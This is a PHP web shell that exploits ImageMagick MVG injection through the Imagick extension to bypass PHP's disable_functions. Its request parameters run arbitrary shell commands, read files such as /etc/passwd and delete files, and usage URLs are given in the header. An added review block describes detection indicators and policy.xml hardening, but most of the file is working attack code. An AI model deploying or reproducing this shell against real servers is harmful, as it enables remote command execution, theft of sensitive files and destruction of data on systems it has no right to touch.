<?php
/*
PHP Imagick disable_functions Bypass
Version: Imagick <= 3.3.0 PHP >= 5.4
Original Author: Ricter <[email protected]>
New Author: Hood3dRob1n
Exec Command: http://site.com/imagick.php?cmd=id
Read File: http://site.com/imagick.php?read=/etc/passwd
Delete File: http://site.com/imagick.php?del=/tmp/removeme.txt
.
..
...
Installation of Imagemagick (Debian/Ubuntu):
apt-get install libmagickwand-dev imagemagick
pecl install imagick
echo "extension=imagick.so" >> /etc/php5/apache2/php.ini
sudo apt-get install php5-imagick
service apache2 restart
...
..
.
*/
/*
Review notes (defender's context):
- This file is a web shell. Each of the three $_REQUEST parameters (cmd, read, del)
  is interpolated, unvalidated, into an MVG (ImageMagick Vector Graphics) document
  that is written to a temp file and read back through Imagick; per the author's
  comments the document is then handed to an external convert call, which is how
  PHP's disable_functions setting is sidestepped.
- What to look for on a host: a PHP worker (php-fpm / apache2) spawning ImageMagick
  or delegate processes, and short-lived files created via tempnam('/tmp', 'img')
  whose content starts with "push graphic-context".
- Hardening that neutralises all three paths: an ImageMagick policy.xml granting
  rights="none" to the MVG, URL, HTTPS, LABEL, TEXT and EPHEMERAL coders, a current
  ImageMagick build, and a web-server user with minimal filesystem rights.
- Code-quality notes: user input is echoed into HTML unescaped (reflected XSS);
  "<font='red'>" is not valid HTML; the trailing "?>" is unnecessary in a PHP-only
  file; Imagick::destroy() is deprecated in favour of clear(); in the read and
  delete paths $data_file is created and unlinked but never written to.
*/
echo "<html><head></head><body>";
# Confirm Imagemagick library is installed and loaded, or bail...
if (extension_loaded('imagick')) {
echo "<b>[*]</b> Imagick is installed<br/>";
# Display disabled_functions() results (informational only; nothing below depends on it)...
echo "<b>Disabled functions:</b><br/><pre>" . ini_get("disable_functions") . "</pre><br/>";
# Get Command from User
if(isset($_REQUEST['cmd'])) {
$command = $_REQUEST['cmd']; # raw request value, no validation or escaping of any kind
echo "<b>[*] Command:</b> " . $command . "<br/><pre>"; # NOTE(review): reflected into HTML without htmlspecialchars()
$data_file = tempnam('/tmp', 'img'); # placeholder to catch command output
$imagick_file = tempnam('/tmp', 'img'); # this will serve as our payload file
$results_file = tempnam('/tmp', 'img'); # This will be our decoy convert output file
# Build the payload, as the actual internal image content directive
# This is what gets parsed and passed to command line call (i.e. /usr/bin/convert)
# (the 'url(...)' fill carries the request value verbatim, including the quote/pipe characters)
$exploit = <<<EOF
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/image.jpg"|$command>$data_file")'
pop graphic-context
EOF;
# Read & Write to trigger the underlying convert call, which triggers command...
file_put_contents("$imagick_file", $exploit); # Write the payload to payload file
$thumb = new Imagick(); # Initialize Imagemagick
$thumb->readImage("$imagick_file"); # Read in the evil image payload
$thumb->writeImage($results_file); # (Try) Write back to disk, triggering convert rce
$thumb->clear(); # Cleanup
$thumb->destroy(); # deprecated in favour of clear(); kept as-is
# Show the command output to the user (whatever the redirect wrote into $data_file, also unescaped)
echo file_get_contents($data_file);
# Remove files
unlink("$data_file");
unlink("$imagick_file");
unlink("$results_file");
echo "</pre>";
}
# Get file to read
if(isset($_REQUEST['read'])) {
$f2read = $_REQUEST['read']; # raw request value, used as a path with no normalisation
echo "<b>[*] File Requested:</b> " . $f2read . "<br/><br/>"; # NOTE(review): reflected into HTML unescaped
$data_file = tempnam('/tmp', 'img'); # placeholder to catch command output (never written to in this branch)
$imagick_file = tempnam('/tmp', 'img'); # this will serve as our payload file
$results_file = tempnam('/tmp', 'img'); # This will render our file content
# Build the payload, as the actual internal image content directive
# This is what gets parsed and passed to command line call (i.e. /usr/bin/convert)
# (the 'label:@' coder reads the named file and rasterises its text into the image)
$exploit = <<<EOF
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'label:@$f2read'
pop graphic-context
EOF;
# Read & Write to trigger the underlying convert call, which triggers command...
file_put_contents("$imagick_file", $exploit); # Write the payload to payload file
$thumb = new Imagick(); # Initialize Imagemagick
$thumb->readImage("$imagick_file"); # Read in the evil image payload
$thumb->setImageFormat('jpeg'); # Set output type to .jpeg so we can load it properly
$thumb->writeImage($results_file); # Write back to disk, triggering convert rendering content to output image
$thumb->clear(); # Cleanup
$thumb->destroy(); # deprecated in favour of clear(); kept as-is
if(is_file($results_file)) {
# Show the command output to the user (use data:// so we can delete file)
$bcontent = base64_encode(file_get_contents($results_file));
echo "<img src=\"data:image/jpeg;base64,$bcontent\"/>";
} else {
echo "<b>[x] Error Converting Image</b>.....";
}
# Remove files
unlink("$data_file");
unlink("$imagick_file");
unlink("$results_file");
echo "<br/>";
}
# Get file to Delete
if(isset($_REQUEST['del'])) {
$f2delete = $_REQUEST['del']; # raw request value, used as a path with no normalisation
if(!is_file($f2delete)) {
echo "<b>[x] File Requested to Delete Doesn't Exist!</b>....<br/><br/>";
echo "<b>[x] Try again with another file....<br/><br/>";
} else {
echo "<b>[*] File Requested to Delete:</b> " . $f2delete . "<br/><br/>"; # NOTE(review): reflected into HTML unescaped
$data_file = tempnam('/tmp', 'img'); # placeholder to catch command output (never written to in this branch)
$imagick_file = tempnam('/tmp', 'img'); # this will serve as our payload file
$results_file = tempnam('/tmp', 'img'); # This will be our decoy convert output file
# Build the payload, as the actual internal image content directive
# This is what gets parsed and passed to command line call (i.e. /usr/bin/convert)
# (the 'ephemeral:' coder removes the named file after reading it; success is checked with is_file() below)
$exploit = <<<EOF
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'ephemeral:$f2delete'
pop graphic-context
EOF;
# Read & Write to trigger the underlying convert call, which triggers command...
file_put_contents("$imagick_file", $exploit); # Write the payload to payload file
$thumb = new Imagick(); # Initialize Imagemagick
$thumb->readImage("$imagick_file"); # Read in the evil image payload
$thumb->writeImage($results_file); # Write back to disk, triggering convert rendering content to output image
$thumb->clear(); # Cleanup
$thumb->destroy(); # deprecated in favour of clear(); kept as-is
if(is_file($f2delete)) {
echo "<b>[x] File was NOT Deleted!</b>....<br/><br/>";
echo "<b>[x] Might be permissions issue, idk....<br/><br/>";
} else {
echo "<b>[*] File Deleted Successfully!</b><br/><br/>";
}
# Remove files
unlink("$data_file");
unlink("$imagick_file");
unlink("$results_file");
echo "<br/>";
}
}
} else {
# NOTE(review): "<font='red'>" is malformed HTML (font has no such attribute form); left unchanged
echo "<font='red'><b>[x]</b> Imagick is NOT Loaded!</font>";
}
echo "</body></html>";
?>